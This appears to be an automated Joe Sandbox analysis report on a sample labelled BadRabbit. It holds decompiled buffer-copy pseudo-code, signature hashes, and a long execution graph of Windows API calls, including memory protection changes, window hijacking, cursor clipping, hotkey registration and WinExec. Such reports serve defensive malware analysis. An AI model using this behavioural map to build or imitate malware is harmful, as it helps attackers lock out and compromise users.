                                                                                                          Similarity
                                                                                                          • API ID: memcpy
                                                                                                          • String ID: Oqt$8 Oqt$8 Oqt$invalid stored block lengths
                                                                                                          • API String ID: 3510742995-2028305883
                                                                                                          • Opcode ID: b21f4038adb9d92d277603ea94d496dc30089681a11ca1c2b40d4ae4d032f2bf
                                                                                                          • Instruction ID: 85213d17bcef36b2837e9a792f2ae9b04064c2f56bc07d683b638ffc6abc774d
                                                                                                          • Opcode Fuzzy Hash: b21f4038adb9d92d277603ea94d496dc30089681a11ca1c2b40d4ae4d032f2bf
                                                                                                          • Instruction Fuzzy Hash: E441F5B1E00619DFCF28DFA9C4806ADBBF6FF88310B14856AD855E7254EB349A81DF41
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 842 882dcb-882ddf 843 882e01-882e04 842->843 844 882de1-882df8 842->844 845 882e14-882e1f 843->845 846 882e06-882e11 843->846 844->843 852 882dfa-882dfc 844->852 848 882e39-882e56 memcpy 845->848 849 882e21-882e30 memcpy 845->849 846->845 850 882e58-882e6d memcpy 848->850 851 882e6f-882e78 848->851 853 882e34-882e37 849->853 850->853 855 882e7a 851->855 856 882e7e-882e83 851->856 857 882e8c-882e90 852->857 854 882e87 853->854 858 882e8a 854->858 855->856 856->858 859 882e85 856->859 858->857 859->854
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00882DCB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                          				intOrPtr _t34;
                                                                                                          				int _t39;
                                                                                                          				int _t41;
                                                                                                          				void* _t49;
                                                                                                          				intOrPtr _t52;
                                                                                                          				int _t53;
                                                                                                          				int _t54;
                                                                                                          				intOrPtr _t57;
                                                                                                          				int _t60;
                                                                                                          				int _t62;
                                                                                                          				intOrPtr _t64;
                                                                                                          				void* _t65;
                                                                                                          
                                                                                                          				_t57 = _a4;
                                                                                                          				_t64 =  *((intOrPtr*)(_t57 + 0x1c));
                                                                                                          				if( *(_t64 + 0x34) != 0) {
                                                                                                          					L3:
                                                                                                          					if( *(_t64 + 0x28) == 0) {
                                                                                                          						 *(_t64 + 0x28) = 1 <<  *(_t64 + 0x24);
                                                                                                          						 *(_t64 + 0x30) = 0;
                                                                                                          						 *(_t64 + 0x2c) = 0;
                                                                                                          					}
                                                                                                          					_t60 =  *(_t64 + 0x28);
                                                                                                          					_t52 = _a12;
                                                                                                          					_t34 = _a8;
                                                                                                          					if(_t52 < _t60) {
                                                                                                          						_t62 =  >  ? _t52 : _t60 -  *(_t64 + 0x30);
                                                                                                          						memcpy( *(_t64 + 0x34) +  *(_t64 + 0x30), _t34 - _t52, _t62);
                                                                                                          						_t53 = _t52 - _t62;
                                                                                                          						if(_t53 == 0) {
                                                                                                          							 *(_t64 + 0x30) =  *(_t64 + 0x30) + _t62;
                                                                                                          							_t54 =  *(_t64 + 0x28);
                                                                                                          							if( *(_t64 + 0x30) == _t54) {
                                                                                                          								 *(_t64 + 0x30) =  *(_t64 + 0x30) & 0x00000000;
                                                                                                          							}
                                                                                                          							_t39 =  *(_t64 + 0x2c);
                                                                                                          							if(_t39 >= _t54) {
                                                                                                          								goto L15;
                                                                                                          							} else {
                                                                                                          								_t41 = _t39 + _t62;
                                                                                                          								goto L14;
                                                                                                          							}
                                                                                                          						}
                                                                                                          						memcpy( *(_t64 + 0x34), _a8 - _t53, _t53);
                                                                                                          						 *(_t64 + 0x30) = _t53;
                                                                                                          						goto L7;
                                                                                                          					} else {
                                                                                                          						memcpy( *(_t64 + 0x34), _t34 - _t60, _t60);
                                                                                                          						 *(_t64 + 0x30) =  *(_t64 + 0x30) & 0x00000000;
                                                                                                          						L7:
                                                                                                          						_t41 =  *(_t64 + 0x28);
                                                                                                          						L14:
                                                                                                          						 *(_t64 + 0x2c) = _t41;
                                                                                                          						L15:
                                                                                                          						return 0;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				_t49 =  *((intOrPtr*)(_t57 + 0x20))( *((intOrPtr*)(_t57 + 0x28)), 1 <<  *(_t64 + 0x24), 1);
                                                                                                          				_t65 = _t65 + 0xc;
                                                                                                          				 *(_t64 + 0x34) = 1;
                                                                                                          				if(_t49 != 0) {
                                                                                                          					goto L3;
                                                                                                          				}
                                                                                                          				return 1;
                                                                                                          			}















                                                                                                          0x00882dce
                                                                                                          0x00882dd4
                                                                                                          0x00882ddf
                                                                                                          0x00882e01
                                                                                                          0x00882e04
                                                                                                          0x00882e0b
                                                                                                          0x00882e0e
                                                                                                          0x00882e11
                                                                                                          0x00882e11
                                                                                                          0x00882e14
                                                                                                          0x00882e17
                                                                                                          0x00882e1a
                                                                                                          0x00882e1f
                                                                                                          0x00882e3e
                                                                                                          0x00882e4c
                                                                                                          0x00882e54
                                                                                                          0x00882e56
                                                                                                          0x00882e6f
                                                                                                          0x00882e72
                                                                                                          0x00882e78
                                                                                                          0x00882e7a
                                                                                                          0x00882e7a
                                                                                                          0x00882e7e
                                                                                                          0x00882e83
                                                                                                          0x00000000
                                                                                                          0x00882e85
                                                                                                          0x00882e85
                                                                                                          0x00000000
                                                                                                          0x00882e85
                                                                                                          0x00882e83
                                                                                                          0x00882e62
                                                                                                          0x00882e6a
                                                                                                          0x00000000
                                                                                                          0x00882e21
                                                                                                          0x00882e28
                                                                                                          0x00882e30
                                                                                                          0x00882e34
                                                                                                          0x00882e34
                                                                                                          0x00882e87
                                                                                                          0x00882e87
                                                                                                          0x00882e8a
                                                                                                          0x00000000
                                                                                                          0x00882e8a
                                                                                                          0x00882e1f
                                                                                                          0x00882ded
                                                                                                          0x00882df0
                                                                                                          0x00882df3
                                                                                                          0x00882df8
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.328686156.0000000000881000.00000020.00000001.01000000.00000006.sdmp, Offset: 00880000, based on PE: true
                                                                                                          • Associated: 00000001.00000002.328679067.0000000000880000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328695785.0000000000884000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328877255.0000000000889000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_880000_Endermanch@BadRabbit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy
                                                                                                          • String ID: 8 Oqt
                                                                                                          • API String ID: 3510742995-3989543947
                                                                                                          • Opcode ID: 44921833c22fa8d99f2d9e117e90f1afde499ff961fd9a67a9b6ee16f76bb84c
                                                                                                          • Instruction ID: 54ca66f47a7540889243b68051ef4f51d1b4c17f75981ab36d084cbeb2f50748
                                                                                                          • Opcode Fuzzy Hash: 44921833c22fa8d99f2d9e117e90f1afde499ff961fd9a67a9b6ee16f76bb84c
                                                                                                          • Instruction Fuzzy Hash: 64214BB2610B059FC760AF29C984923B7EAFF987197841A2DE88AC7E01D731F855CF54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:10.3%
                                                                                                          Dynamic/Decrypted Code Coverage:17.1%
                                                                                                          Signature Coverage:4.1%
                                                                                                          Total number of Nodes:1156
                                                                                                          Total number of Limit Nodes:21
                                                                                                          execution_graph 13127 406520 13173 403a44 13127->13173 13129 406659 13132 4066bf 13129->13132 13233 4079f0 13129->13233 13130 40657f 13177 4083e0 13130->13177 13142 40671e 13132->13142 13241 407a18 13132->13241 13135 406586 13182 407fd0 13135->13182 13140 40669d 13145 4079f0 5 API calls 13140->13145 13249 4039ac 13142->13249 13148 4066a6 13145->13148 13147 4066fc 13151 407a18 5 API calls 13147->13151 13148->13132 13152 4079fc 7 API calls 13148->13152 13154 406705 13151->13154 13152->13132 13154->13142 13156 407a24 7 API calls 13154->13156 13156->13142 13160 4065fc 13221 406b4c 13160->13221 13162 406616 13165 406e28 13 API calls 13162->13165 13164 407fd0 51 API calls 13167 406609 13164->13167 13166 40663b DrawTextA 13165->13166 13166->13129 13168 406648 13166->13168 13229 406e28 13167->13229 13170 407fd0 51 API calls 13168->13170 13172 406650 SelectObject 13170->13172 13172->13129 13174 403a48 13173->13174 13175 403a6c 13174->13175 13253 402658 13174->13253 13175->13129 13175->13130 13194 403c50 13175->13194 13178 4083e5 13177->13178 13179 4083e7 13177->13179 13178->13135 13180 4083f7 13179->13180 13297 4076a4 13179->13297 13180->13135 13304 408410 13182->13304 13184 407fd9 13185 406591 13184->13185 13331 4060b0 13184->13331 13191 406dfc 13185->13191 13189 408010 13189->13185 13190 406a20 DeleteObject 13189->13190 13190->13185 13539 4081c0 13191->13539 13193 40659c 13193->13129 13208 4077ec 13193->13208 13195 403c93 13194->13195 13196 403c54 13194->13196 13195->13130 13197 403c5e 13196->13197 13198 403a00 13196->13198 13199 403c71 13197->13199 13200 403c88 13197->13200 13204 403a70 25 API calls 13198->13204 13205 403a14 13198->13205 13201 403f68 25 API calls 13199->13201 13203 403f68 25 API calls 13200->13203 13207 403c76 13201->13207 13202 403a42 13202->13130 13203->13207 13204->13205 13205->13202 13206 402658 11 API calls 13205->13206 13206->13202 13207->13130 13209 4077ff 13208->13209 13210 4083e0 2 API calls 13209->13210 13211 407806 13210->13211 13212 4065bf 13211->13212 13213 407809 GetClientRect 13211->13213 13212->13162 13214 407d04 13212->13214 13213->13212 13215 407d38 13214->13215 13216 407d0d 13214->13216 13215->13160 13543 4069d0 13216->13543 13218 407d13 13546 406828 13218->13546 13220 407d1c 13220->13160 13224 406b4d 13221->13224 13222 406a10 GetSysColor 13222->13224 13223 406601 13223->13164 13224->13222 13224->13223 13225 406b8f 13224->13225 13556 406ab8 13224->13556 13226 406a10 GetSysColor 13225->13226 13226->13223 13230 40660e SelectObject 13229->13230 13231 406e34 13229->13231 13230->13162 13232 406d5c 13 API calls 13231->13232 13232->13230 13559 407744 13233->13559 13236 4079fc 13237 407744 5 API calls 13236->13237 13238 407a02 13237->13238 13572 407754 13238->13572 13242 407744 5 API calls 13241->13242 13243 4066e5 13242->13243 13243->13147 13244 407a24 13243->13244 13245 407744 5 API calls 13244->13245 13246 407a2a 13245->13246 13247 407754 7 API calls 13246->13247 13248 407a3d 13247->13248 13248->13147 13250 4039b2 13249->13250 13252 4039cd 13249->13252 13251 402658 11 API calls 13250->13251 13250->13252 13251->13252 13254 402670 13253->13254 13255 40265d 13253->13255 13254->13175 13255->13254 13257 402720 13255->13257 13258 4026d4 13257->13258 13259 4026f9 13258->13259 13263 405580 13258->13263 13271 4026c8 13259->13271 13264 4055b5 TlsGetValue 13263->13264 13265 40558f 13263->13265 13266 40559a 13264->13266 13267 4055bf 13264->13267 13265->13259 13274 40553c 13266->13274 13267->13259 13269 40559f TlsGetValue 13270 4055ae 13269->13270 13270->13259 13281 403994 13271->13281 13275 405542 13274->13275 13276 405566 13275->13276 13280 405528 LocalAlloc 13275->13280 13276->13269 13278 405562 13278->13276 13279 405572 TlsSetValue 13278->13279 13279->13276 13280->13278 13284 4038bc 13281->13284 13285 4038d5 13284->13285 13287 4038fe 13285->13287 13291 403830 13285->13291 13288 403940 FreeLibrary 13287->13288 13289 403964 ExitProcess 13287->13289 13288->13287 13292 403891 13291->13292 13293 40383a GetStdHandle WriteFile GetStdHandle WriteFile 13291->13293 13295 40389a MessageBoxA 13292->13295 13296 4038ad 13292->13296 13293->13287 13295->13296 13296->13287 13298 4076ac 13297->13298 13299 4076c9 13298->13299 13300 4076b8 ShowWindow 13298->13300 13301 4076ca ShowWindow 13298->13301 13299->13180 13300->13299 13302 4076dd 13301->13302 13302->13180 13305 40841d 13304->13305 13306 408417 13304->13306 13308 40844b LoadCursorA 13305->13308 13310 40843c 13305->13310 13312 408426 13305->13312 13307 4083e0 2 API calls 13306->13307 13307->13305 13343 4086a4 13308->13343 13310->13184 13311 40847b 13347 405be0 13311->13347 13312->13310 13313 4076a4 2 API calls 13312->13313 13313->13310 13318 4084fa GetClassInfoA 13319 40851e 13318->13319 13320 40853f GetClassInfoA 13319->13320 13321 4085f8 13319->13321 13322 40855c RegisterClassA 13320->13322 13323 40857d CreateWindowExA 13320->13323 13321->13184 13322->13321 13322->13323 13323->13321 13324 40858f SendMessageA GetWindowLongA 13323->13324 13325 4085be 13324->13325 13326 4085af SetWindowLongA 13324->13326 13327 4085d9 13325->13327 13354 40784c 13325->13354 13326->13325 13327->13321 13470 4067f8 13331->13470 13334 4060d7 13334->13185 13336 406a20 13334->13336 13337 406a24 13336->13337 13339 406a2c 13336->13339 13337->13189 13338 406a65 13338->13189 13339->13338 13535 406a6c 13339->13535 13341 406a4e 13342 406a6c DeleteObject 13341->13342 13342->13338 13344 4086b3 13343->13344 13345 4086c6 13344->13345 13363 403c94 13344->13363 13345->13311 13348 4039ac 11 API calls 13347->13348 13349 405bec 13348->13349 13350 407aa8 13349->13350 13351 407abf 13350->13351 13352 407ab6 13350->13352 13351->13318 13351->13319 13352->13351 13353 4083e0 2 API calls 13352->13353 13353->13351 13355 407857 13354->13355 13358 407898 13354->13358 13356 407888 LoadIconA 13355->13356 13357 407866 13355->13357 13355->13358 13356->13358 13357->13358 13359 407870 CopyImage 13357->13359 13360 40802c 13358->13360 13359->13358 13361 4083e0 2 API calls 13360->13361 13362 408040 SendMessageA 13361->13362 13362->13327 13364 403c98 13363->13364 13372 403c50 13363->13372 13365 403a00 13364->13365 13367 403cb6 13364->13367 13368 403ca8 13364->13368 13364->13372 13375 403a14 13365->13375 13385 403a70 13365->13385 13366 403a42 13366->13345 13369 403a70 25 API calls 13367->13369 13396 403a00 13368->13396 13374 403cc9 13369->13374 13371 403c93 13371->13345 13372->13365 13372->13371 13376 403c5e 13372->13376 13383 403a00 25 API calls 13374->13383 13375->13366 13377 402658 11 API calls 13375->13377 13378 403c71 13376->13378 13379 403c88 13376->13379 13377->13366 13390 403f68 13378->13390 13381 403f68 25 API calls 13379->13381 13382 403c76 13381->13382 13382->13345 13384 403cf5 13383->13384 13384->13345 13386 403a74 13385->13386 13387 403a98 13385->13387 13402 402638 13386->13402 13387->13375 13392 403f75 13390->13392 13395 403fa5 13390->13395 13391 4039ac 11 API calls 13393 403f81 13391->13393 13392->13393 13394 403a70 25 API calls 13392->13394 13393->13382 13394->13395 13395->13391 13397 403a04 13396->13397 13399 403a14 13396->13399 13397->13399 13400 403a70 25 API calls 13397->13400 13398 403a42 13398->13372 13399->13398 13401 402658 11 API calls 13399->13401 13400->13399 13401->13398 13403 40263d 13402->13403 13406 402650 13402->13406 13408 402064 13403->13408 13404 402643 13405 402720 11 API calls 13404->13405 13404->13406 13405->13406 13406->13375 13409 40207d 13408->13409 13410 402078 13408->13410 13412 4020aa RtlEnterCriticalSection 13409->13412 13413 4020b4 13409->13413 13416 402089 13409->13416 13419 401978 RtlInitializeCriticalSection 13410->13419 13412->13413 13413->13416 13426 401f70 13413->13426 13416->13404 13417 4021d5 RtlLeaveCriticalSection 13418 4021df 13417->13418 13418->13404 13420 40199c RtlEnterCriticalSection 13419->13420 13421 4019a6 13419->13421 13420->13421 13422 4019c4 LocalAlloc 13421->13422 13423 4019de 13422->13423 13424 401a23 RtlLeaveCriticalSection 13423->13424 13425 401a2d 13423->13425 13424->13425 13425->13409 13429 401f80 13426->13429 13427 401fac 13431 401fd0 13427->13431 13437 401d84 13427->13437 13429->13427 13429->13431 13432 401ee4 13429->13432 13431->13417 13431->13418 13441 401738 13432->13441 13434 401ef4 13435 401f01 13434->13435 13450 401e58 13434->13450 13435->13429 13438 401dd9 13437->13438 13439 401da2 13437->13439 13438->13439 13457 401cd4 13438->13457 13439->13431 13442 401754 13441->13442 13443 40175e 13442->13443 13444 401490 LocalAlloc VirtualAlloc VirtualFree 13442->13444 13446 40176a 13442->13446 13447 40138c LocalAlloc 13442->13447 13448 4017af 13442->13448 13445 401624 VirtualAlloc 13443->13445 13444->13442 13445->13446 13446->13434 13447->13442 13449 40156c VirtualFree 13448->13449 13449->13446 13451 401e0c 9 API calls 13450->13451 13452 401e6c 13451->13452 13453 40138c LocalAlloc 13452->13453 13454 401e7c 13453->13454 13455 401bb0 9 API calls 13454->13455 13456 401e84 13454->13456 13455->13456 13456->13435 13458 401cea 13457->13458 13459 401d15 13458->13459 13460 401d29 13458->13460 13469 401d72 13458->13469 13461 4018ec LocalAlloc VirtualFree VirtualFree 13459->13461 13462 4018ec LocalAlloc VirtualFree VirtualFree 13460->13462 13463 401d27 13461->13463 13462->13463 13464 401bb0 9 API calls 13463->13464 13463->13469 13465 401d4d 13464->13465 13466 401d67 13465->13466 13467 401c04 9 API calls 13465->13467 13468 4013fc LocalAlloc 13466->13468 13467->13466 13468->13469 13469->13439 13481 402d00 13470->13481 13472 4060c1 13472->13334 13473 406d5c 13472->13473 13474 406dc1 13473->13474 13475 406d69 13473->13475 13474->13334 13477 406da0 13475->13477 13478 406d93 13475->13478 13479 406d88 ReleaseDC 13475->13479 13477->13474 13487 406dc4 13477->13487 13478->13477 13480 406d9a DeleteDC 13478->13480 13479->13477 13480->13477 13482 402d05 13481->13482 13483 402d06 13481->13483 13482->13472 13484 402d47 13483->13484 13485 402638 25 API calls 13483->13485 13484->13472 13486 402d18 13485->13486 13486->13472 13490 406de8 13487->13490 13489 406dd4 13489->13474 13493 406cec 13490->13493 13494 406cfe 13493->13494 13495 406d10 13494->13495 13496 406e28 13 API calls 13494->13496 13497 406d50 MoveToEx 13495->13497 13498 406d29 13495->13498 13503 406c0c 13495->13503 13496->13495 13497->13489 13499 406d35 13498->13499 13516 406c5c 13498->13516 13499->13497 13523 406ba4 13499->13523 13504 406c44 13503->13504 13505 406c14 13503->13505 13506 406c42 13504->13506 13508 406a10 GetSysColor 13504->13508 13532 406a10 13505->13532 13506->13498 13510 406c57 13508->13510 13512 406c3c SetTextColor 13510->13512 13511 406b4c 3 API calls 13513 406c25 13511->13513 13512->13506 13514 406e28 11 API calls 13513->13514 13515 406c34 SelectObject 13514->13515 13515->13512 13517 406c91 13516->13517 13518 406c61 13516->13518 13517->13499 13519 406b4c 3 API calls 13518->13519 13520 406c73 13519->13520 13521 406e28 11 API calls 13520->13521 13522 406c82 SelectObject SetROP2 13521->13522 13522->13517 13524 406bac 13523->13524 13528 406bd2 13523->13528 13526 406b4c 3 API calls 13524->13526 13525 406bf8 13525->13497 13527 406bb3 13526->13527 13529 406e28 10 API calls 13527->13529 13528->13525 13531 406bee SetBkColor SetBkMode 13528->13531 13530 406bc2 SelectObject 13529->13530 13530->13528 13531->13525 13533 406a16 GetSysColor 13532->13533 13534 406a1f 13532->13534 13533->13534 13534->13511 13536 406a73 13535->13536 13537 406a80 13535->13537 13538 406a7a DeleteObject 13536->13538 13537->13341 13540 4081c7 13539->13540 13541 406cec 13 API calls 13540->13541 13542 4081db GetTextExtentPoint32A 13541->13542 13542->13193 13550 405f08 13543->13550 13545 4069e0 13545->13218 13547 406832 13546->13547 13549 406837 13546->13549 13553 405d04 13547->13553 13549->13220 13551 4067f8 25 API calls 13550->13551 13552 405f15 13551->13552 13552->13545 13554 4067f8 25 API calls 13553->13554 13555 405d11 13554->13555 13555->13549 13557 406a6c DeleteObject 13556->13557 13558 406abe DeleteObject 13557->13558 13558->13224 13562 4076ec 13559->13562 13563 407702 GetWindowRect 13562->13563 13564 406686 13562->13564 13563->13564 13565 40770f 13563->13565 13564->13140 13564->13236 13569 406130 13565->13569 13568 40771a ClientToScreen OffsetRect 13568->13564 13570 407aa8 2 API calls 13569->13570 13571 406137 13570->13571 13571->13564 13571->13568 13573 407744 5 API calls 13572->13573 13575 40775f 13573->13575 13574 4077ca 13574->13140 13575->13574 13576 4077bc 13575->13576 13577 40779e SetWindowPos 13575->13577 13576->13574 13579 407838 13576->13579 13577->13576 13580 40784a 13579->13580 13581 40783d InvalidateRect 13579->13581 13580->13574 13581->13580 13582 408062 13587 408088 13582->13587 13584 40806c 13597 406818 13584->13597 13586 408072 13588 4080ef 13587->13588 13589 40808f 13587->13589 13588->13584 13590 408096 13589->13590 13591 4080d9 13589->13591 13593 4080ad 13590->13593 13601 406ebc 13590->13601 13591->13588 13592 4080e0 KillTimer 13591->13592 13592->13588 13594 4083e0 2 API calls 13593->13594 13596 4080ce SetTimer 13594->13596 13596->13584 13598 40681e 13597->13598 13599 402658 11 API calls 13598->13599 13600 406826 13599->13600 13600->13586 13620 406eac 13601->13620 13604 406eeb 13606 406828 25 API calls 13604->13606 13607 406f16 13606->13607 13608 406f96 13607->13608 13609 406a20 DeleteObject 13607->13609 13608->13593 13610 406f3c 13609->13610 13611 406f64 13610->13611 13626 407d3c 13610->13626 13612 406a20 DeleteObject 13611->13612 13614 406f6e 13612->13614 13614->13608 13630 407d54 13614->13630 13616 406828 25 API calls 13616->13611 13619 406828 25 API calls 13619->13608 13635 407994 13620->13635 13623 406e68 13638 4060e0 13623->13638 13627 407d4c 13626->13627 13628 407838 InvalidateRect 13627->13628 13629 406f57 13628->13629 13629->13616 13631 407d64 DeleteObject 13630->13631 13632 407d6c 13630->13632 13631->13632 13633 407838 InvalidateRect 13632->13633 13634 406f89 13633->13634 13634->13619 13636 402d00 25 API calls 13635->13636 13637 406ebb 13636->13637 13637->13604 13637->13623 13639 4067f8 25 API calls 13638->13639 13640 4060ed 13639->13640 13640->13604 14532 560a24 14533 562ac7 14532->14533 14535 561b31 NtProtectVirtualMemory 14533->14535 14536 56229d 14535->14536 14536->14533 14537 56124e 14538 5623c9 14537->14538 14540 560077 NtAllocateVirtualMemory 14538->14540 14541 563a8e 14540->14541 14541->14538 14542 560ece 14543 560ed8 14542->14543 14544 561b31 NtProtectVirtualMemory 14543->14544 14544->14543 13641 56093c NtQuerySystemInformation 13642 564f53 13641->13642 13643 40732c 13644 40733c 13643->13644 13645 4073a6 13644->13645 13646 40737c 13644->13646 13648 4073bb SetWindowLongA 13645->13648 13649 4073ed 13645->13649 13671 4073ac 13645->13671 13647 407393 PostQuitMessage 13646->13647 13646->13671 13647->13671 13658 4073fc 13648->13658 13651 4073f3 13649->13651 13652 40740a 13649->13652 13650 4078a0 2 API calls 13650->13658 13672 4078a0 13651->13672 13653 407410 13652->13653 13654 407459 13652->13654 13667 40743a PostMessageA 13653->13667 13653->13671 13656 407488 13654->13656 13657 40745f 13654->13657 13660 407495 SendMessageA 13656->13660 13661 4074ad 13656->13661 13675 4078c0 13657->13675 13660->13658 13662 4074b3 GetWindowLongA 13661->13662 13663 4074dd 13661->13663 13665 4074c5 SendMessageA 13662->13665 13662->13671 13666 4074ee GetFocus 13663->13666 13663->13671 13665->13658 13666->13658 13670 4074fc 13666->13670 13667->13658 13668 4078a0 2 API calls 13668->13658 13669 40751b GetKeyState GetKeyState 13669->13671 13670->13658 13670->13669 13671->13650 13671->13658 13673 4078b8 NtdllDefWindowProc_A 13672->13673 13674 4078ae CallWindowProcA 13672->13674 13673->13658 13674->13658 13680 4078e4 13675->13680 13677 4078c8 13678 407466 13677->13678 13679 4078cc SetFocus 13677->13679 13678->13658 13678->13668 13679->13678 13681 4078f0 13680->13681 13682 4078e9 IsWindowEnabled 13680->13682 13681->13677 13682->13677 14545 416fdd 14546 416fe3 14545->14546 14549 416f28 FindWindowA 14546->14549 14550 416f44 FindWindowA 14549->14550 14551 416f38 PostMessageA 14549->14551 14553 416f60 FindWindowA 14550->14553 14554 416f54 PostMessageA 14550->14554 14551->14550 14556 416f70 PostMessageA 14553->14556 14557 416f7c FindWindowA 14553->14557 14554->14553 14556->14557 14559 416f8a 14557->14559 14560 416f98 FindWindowA RegisterHotKey GetWindowRect ClipCursor 14559->14560 14561 416f8c PostMessageA 14559->14561 14561->14560 13683 4171ac 13684 417202 13683->13684 13693 4055cc GetModuleHandleA 13684->13693 13691 4038bc 7 API calls 13692 41727c 13691->13692 13694 4055ff 13693->13694 13873 403718 13694->13873 13697 415e7c 13698 4067f8 25 API calls 13697->13698 13699 415e90 13698->13699 13925 406fb4 13699->13925 13704 406828 25 API calls 13705 415ec7 13704->13705 13935 406298 13705->13935 13711 415ef3 13962 407a44 13711->13962 13715 415f14 13978 406450 13715->13978 13718 406828 25 API calls 13719 415f31 13718->13719 13720 406450 25 API calls 13719->13720 13721 415f4c 13720->13721 13722 406828 25 API calls 13721->13722 13723 415f5f 13722->13723 13981 4082e0 13723->13981 13726 406780 7 API calls 13727 415f8e 13726->13727 13728 407d04 25 API calls 13727->13728 13729 415fa3 13728->13729 13986 405f18 13729->13986 13732 407d04 25 API calls 13733 415fb7 13732->13733 13991 406afc 13733->13991 13736 407d04 25 API calls 13737 415fcc 13736->13737 13995 40819c 13737->13995 13740 407a44 7 API calls 13741 415fe5 13740->13741 13999 408398 13741->13999 13744 406780 7 API calls 13745 415ffa 13744->13745 14002 407b6c 13745->14002 13747 416009 13748 407a44 7 API calls 13747->13748 13749 416023 13748->13749 13750 4082e0 29 API calls 13749->13750 13751 416032 13750->13751 13752 406780 7 API calls 13751->13752 13753 416041 13752->13753 13754 407d04 25 API calls 13753->13754 13755 416060 13754->13755 13756 405f18 2 API calls 13755->13756 13757 41606a 13756->13757 13758 407d04 25 API calls 13757->13758 13759 416074 13758->13759 13760 406afc DeleteObject 13759->13760 13761 41607f 13760->13761 13762 407d04 25 API calls 13761->13762 13763 416089 13762->13763 13764 40819c DeleteObject 13763->13764 13765 416093 13764->13765 13766 407a44 7 API calls 13765->13766 13767 4160a2 13766->13767 14007 4070ac 13767->14007 13770 406780 7 API calls 13771 4160c2 13770->13771 14011 4076e0 13771->14011 13776 4070ac 28 API calls 13777 4160f2 13776->13777 13778 406780 7 API calls 13777->13778 13779 4160fe 13778->13779 13780 407b6c 7 API calls 13779->13780 13781 41610d 13780->13781 13782 407d04 25 API calls 13781->13782 13783 41611b 13782->13783 13784 405f18 2 API calls 13783->13784 13785 416125 13784->13785 13786 407d04 25 API calls 13785->13786 13787 41612f 13786->13787 13788 40819c DeleteObject 13787->13788 13789 416139 13788->13789 14021 407f74 13789->14021 13796 40766c 27 API calls 13797 416178 13796->13797 14040 408320 13797->14040 13799 416187 13800 406780 7 API calls 13799->13800 13801 416196 13800->13801 13802 407b6c 7 API calls 13801->13802 13803 4161a5 13802->13803 13804 407d04 25 API calls 13803->13804 13805 4161bf 13804->13805 13806 40819c DeleteObject 13805->13806 13807 4161c9 13806->13807 14045 406ff0 13807->14045 13809 4161d8 13810 406780 7 API calls 13809->13810 13811 4161e7 13810->13811 13812 407b6c 7 API calls 13811->13812 13813 4161f3 13812->13813 13814 4070ac 28 API calls 13813->13814 13815 416213 13814->13815 13816 406780 7 API calls 13815->13816 13817 416222 13816->13817 13818 407b6c 7 API calls 13817->13818 13819 41622e 13818->13819 13820 4070ac 28 API calls 13819->13820 13821 416244 13820->13821 13822 406780 7 API calls 13821->13822 13823 416253 13822->13823 13824 4076e0 2 API calls 13823->13824 13825 416263 13824->13825 13826 40766c 27 API calls 13825->13826 13827 416272 13826->13827 13828 4070ac 28 API calls 13827->13828 13829 416283 13828->13829 13830 406780 7 API calls 13829->13830 13831 41628f 13830->13831 13832 407b6c 7 API calls 13831->13832 13833 41629e 13832->13833 13834 407d04 25 API calls 13833->13834 13835 4162ac 13834->13835 13836 40819c DeleteObject 13835->13836 13837 4162b6 13836->13837 13838 407f74 3 API calls 13837->13838 13839 4162c2 LoadCursorA 13838->13839 13840 4075fc 6 API calls 13839->13840 13841 4162da 13840->13841 13842 4072f8 3 API calls 13841->13842 13843 4162e6 13842->13843 13844 40766c 27 API calls 13843->13844 13845 4162f5 13844->13845 14050 406430 13845->14050 13848 407a44 7 API calls 13849 416316 13848->13849 13850 407a44 7 API calls 13849->13850 13851 416325 13850->13851 14053 406400 13851->14053 13853 416337 13854 407a44 7 API calls 13853->13854 13855 416346 13854->13855 13856 407a44 7 API calls 13855->13856 13857 416355 13856->13857 13858 407a44 7 API calls 13857->13858 13859 416370 13858->13859 14056 407e20 13859->14056 13861 41637a 13862 40802c 3 API calls 13861->13862 13863 416395 13862->13863 14072 416e5c WinExec 13863->14072 13866 40695c 13867 406998 13866->13867 13868 406961 13866->13868 13867->13691 13869 406978 WaitMessage 13868->13869 13870 40698d 13868->13870 14503 407b18 13869->14503 13870->13867 14507 406910 13870->14507 13874 40374b 13873->13874 13877 4036b8 13874->13877 13878 4036f4 13877->13878 13879 4036c7 13877->13879 13878->13697 13879->13878 13881 402638 25 API calls 13879->13881 13882 404874 13879->13882 13881->13879 13883 404884 GetModuleFileNameA 13882->13883 13884 4048a0 13882->13884 13886 404ab0 GetModuleFileNameA RegOpenKeyExA 13883->13886 13884->13879 13887 404b33 13886->13887 13888 404af3 RegOpenKeyExA 13886->13888 13904 4048f8 GetModuleHandleA 13887->13904 13888->13887 13890 404b11 RegOpenKeyExA 13888->13890 13890->13887 13891 404bbc lstrcpyn GetThreadLocale GetLocaleInfoA 13890->13891 13895 404bf3 13891->13895 13896 404cd6 13891->13896 13893 404b78 RegQueryValueExA 13894 404b96 RegCloseKey 13893->13894 13894->13884 13895->13896 13898 404c03 lstrlen 13895->13898 13896->13884 13899 404c1b 13898->13899 13899->13896 13900 404c40 lstrcpyn LoadLibraryExA 13899->13900 13901 404c68 13899->13901 13900->13901 13901->13896 13902 404c72 lstrcpyn LoadLibraryExA 13901->13902 13902->13896 13903 404ca4 lstrcpyn LoadLibraryExA 13902->13903 13903->13896 13905 404920 GetProcAddress 13904->13905 13907 404960 13904->13907 13906 404931 13905->13906 13905->13907 13906->13907 13912 404947 lstrcpyn 13906->13912 13909 404a82 RegQueryValueExA 13907->13909 13917 404993 13907->13917 13921 4048e4 13907->13921 